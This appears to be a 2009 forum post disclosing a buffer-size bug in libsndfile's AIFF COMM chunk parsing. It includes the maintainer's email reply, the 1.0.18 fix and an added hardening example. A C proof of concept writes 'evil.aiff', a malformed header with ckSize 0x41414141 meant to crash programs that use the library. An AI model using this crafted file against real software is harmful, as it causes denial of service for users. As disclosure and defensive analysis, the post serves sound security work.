Well, it has now been fixed.
http://www.mega-nerd.com/libsndfile/
Version 1.0.18 (Feb 07 2009) Add Ogg/Vorbis support, remove captive libraries, many new features and bug fixes. Generate Win32 and Win64 pre-compiled binaries.
The COMM chunk size is now run through the following check (it catches a size field that was written with the wrong byte order):
if (comm_fmt->size > 0x10000 && (comm_fmt->size & 0xffff) == 0)
{   psf_log_printf (psf, " COMM : %d (0x%x) *** should be ", comm_fmt->size, comm_fmt->size) ;
    comm_fmt->size = ENDSWAP_INT (comm_fmt->size) ;
    psf_log_printf (psf, "%d (0x%x)\n", comm_fmt->size, comm_fmt->size) ;
    }
else
    psf_log_printf (psf, " COMM : %d\n", comm_fmt->size) ;
This is from 7 February, shortly after I notified him. Apparently he already knew about the bug from some other source, but the update was overdue anyway, since no new version had been released since 2006:
date 25 January 2009 4:06
subject Re: libsndfile AIFF buffer unverified
Anon wrote:
> Testing and debugging winamp, about (bugtraq ID: 33226), I have verified that
> the bug is specific to the library libsndfile. I saw that some of the functions
> that read AIFF file headers do not check the limits of
> (CommonChunk.ckSize). There may be other functions with the same problem.
> One of the errors occurs when memset is called with the unverified memory limit.
>
> Quote segment code at src/aiff.c: 847
>
> ============================================================
> else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
> {
> //Some lines omitted
>
> memset (psf->u.scbuf, 0, comm_fmt->size);
> ============================================================
I agree that is an issue and it was fixed some time ago in the development
version.
> Denial of Service to any programs that run the library.
Yes, it could result in a program crash
Erik
Here is the C version of the Perl PoC.
#include <stdio.h>
#include <stdlib.h>

/* 81 bytes: "FORM" <size> "AIFF" "COMM" <ckSize> <filler>; the four 0x41 bytes
 * right after "COMM" are the ckSize (0x41414141) that the parser trusts. */
#define AIFFSIZE 81

char *aiffbuff = "\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void) {
    FILE *aiff = fopen("evil.aiff", "wb");   /* binary mode: no newline translation on Windows */
    if (aiff == NULL) {
        perror("fopen");
        return EXIT_FAILURE;
    }
    fwrite(aiffbuff, AIFFSIZE, 1, aiff);
    fclose(aiff);
    return EXIT_SUCCESS;
}
Regards.
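The following is an added example written for this page; it is not libsndfile code and not the PoC author's. It ties together the two snippets above: a small AIFF chunk walker that (a) reproduces the pattern from the bug report, where the COMM ckSize is passed to memset on a fixed buffer as soon as it clears the minimum chunk size, and (b) applies the 1.0.18 byte-order heuristic quoted above followed by a bounds check against the destination buffer. The heuristic only repairs a size whose low 16 bits are zero, so the PoC's 0x41414141 passes through it unchanged; the bounds check is what rejects it. SCBUF_SIZE (1024), the enum names and the three sample headers are this example's own assumptions and constructed inputs (evil_aiff repeats the head of the PoC's evil.aiff), not values from libsndfile.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed scratch buffer the COMM body is copied into.
 * Example value, not the real size of libsndfile's psf->u.scbuf. */
#define SCBUF_SIZE 1024
/* Plain AIFF COMM body: numChannels(2) numSampleFrames(4) sampleSize(2) sampleRate(10). */
#define AIFF_COMM_SIZE 18

enum comm_result {
    COMM_OK = 0,         /* chunk accepted and copied */
    COMM_NOT_FOUND = 1,  /* no COMM chunk in the data */
    COMM_TOO_LARGE = 2,  /* ckSize exceeds the scratch buffer */
    COMM_TRUNCATED = 3   /* ckSize runs past the end of the file */
};

/* IFF fields are big-endian: 4-byte ID followed by a 4-byte size. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Same job as ENDSWAP_INT in the 1.0.18 snippet. */
static uint32_t swap32(uint32_t v)
{
    return (v >> 24) | ((v >> 8) & 0xff00u) | ((v << 8) & 0xff0000u) | (v << 24);
}

/* Walk the chunks after "FORM <size> AIFF" looking for COMM. On success *off is
 * the offset of the COMM body and *cksize its declared (untrusted) size. */
static int find_comm(const unsigned char *buf, size_t len, size_t *off, uint32_t *cksize)
{
    size_t pos = 12;
    while (pos + 8 <= len) {
        uint32_t sz = be32(buf + pos + 4);
        if (memcmp(buf + pos, "COMM", 4) == 0) {
            *off = pos + 8;
            *cksize = sz;
            return 1;
        }
        size_t step = (size_t)sz + (sz & 1u);   /* chunks are padded to even length */
        if (step > len - (pos + 8))             /* stop instead of wrapping pos */
            return 0;
        pos += 8 + step;
    }
    return 0;
}

/* The pattern from the bug report: once ckSize clears the minimum it goes straight
 * to memset on a fixed buffer. Instead of performing that write, return the length
 * memset would be given (0 if there is no COMM chunk). */
uint32_t vulnerable_memset_length(const unsigned char *buf, size_t len)
{
    size_t off;
    uint32_t size;
    if (!find_comm(buf, len, &off, &size))
        return 0;
    if (size >= AIFF_COMM_SIZE)
        return size;   /* memset (psf->u.scbuf, 0, comm_fmt->size) with this value */
    return 0;
}

/* The 1.0.18 byte-order heuristic, then a bounds check (the bounds check is this
 * example's addition). Copies the COMM body into scbuf only when it fits. */
enum comm_result read_comm_hardened(const unsigned char *buf, size_t len,
                                    unsigned char *scbuf, uint32_t *out_size)
{
    size_t off;
    uint32_t size;
    if (!find_comm(buf, len, &off, &size))
        return COMM_NOT_FOUND;
    /* Above 64 KiB with the low 16 bits clear: almost certainly a little-endian
     * size from a broken encoder, so swap it back. */
    if (size > 0x10000 && (size & 0xffff) == 0)
        size = swap32(size);
    *out_size = size;
    if (size > SCBUF_SIZE)
        return COMM_TOO_LARGE;   /* the evil.aiff case: 0x41414141 */
    if (size > len - off)
        return COMM_TRUNCATED;
    memset(scbuf, 0, size);      /* now bounded by SCBUF_SIZE */
    memcpy(scbuf, buf + off, size);
    return COMM_OK;
}

/* Constructed samples. evil_aiff repeats the head of the PoC's evil.aiff (COMM
 * ckSize "AAAA" = 0x41414141). good_aiff is a minimal valid header: ckSize 18,
 * 1 channel, 16-bit, 44100 Hz as an 80-bit float. swapped_aiff is the same with
 * the ckSize written little-endian (0x12000000). */
static const unsigned char evil_aiff[] =
    "FORM\x00\x04\xcd\xec" "AIFF" "COMM" "AAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
#define COMM_BODY "\x00\x01" "\x00\x00\x00\x00" "\x00\x10" \
                  "\x40\x0e\xac\x44\x00\x00\x00\x00\x00\x00"
static const unsigned char good_aiff[] =
    "FORM\x00\x00\x00\x1e" "AIFF" "COMM" "\x00\x00\x00\x12" COMM_BODY;
static const unsigned char swapped_aiff[] =
    "FORM\x00\x00\x00\x1e" "AIFF" "COMM" "\x12\x00\x00\x00" COMM_BODY;

int main(void)
{
    unsigned char scbuf[SCBUF_SIZE];
    uint32_t n = 0;
    unsigned long would_write = vulnerable_memset_length(evil_aiff, sizeof evil_aiff - 1);
    int verdict = read_comm_hardened(evil_aiff, sizeof evil_aiff - 1, scbuf, &n);
    printf("evil.aiff: vulnerable path would memset %lu bytes into a %d-byte buffer, "
           "hardened verdict %d\n", would_write, SCBUF_SIZE, verdict);
    verdict = read_comm_hardened(swapped_aiff, sizeof swapped_aiff - 1, scbuf, &n);
    printf("little-endian ckSize: hardened verdict %d, size after swap %lu\n",
           verdict, (unsigned long)n);
    return 0;
}
```

Note that the byte-swap heuristic is a compatibility fix for badly written files, not a security check: it rewrites the value but never compares it with the size of the buffer that is about to be written. Any parser that copies a length-prefixed chunk into fixed storage needs the explicit comparison against sizeof the destination, independent of whatever endianness repair it does first.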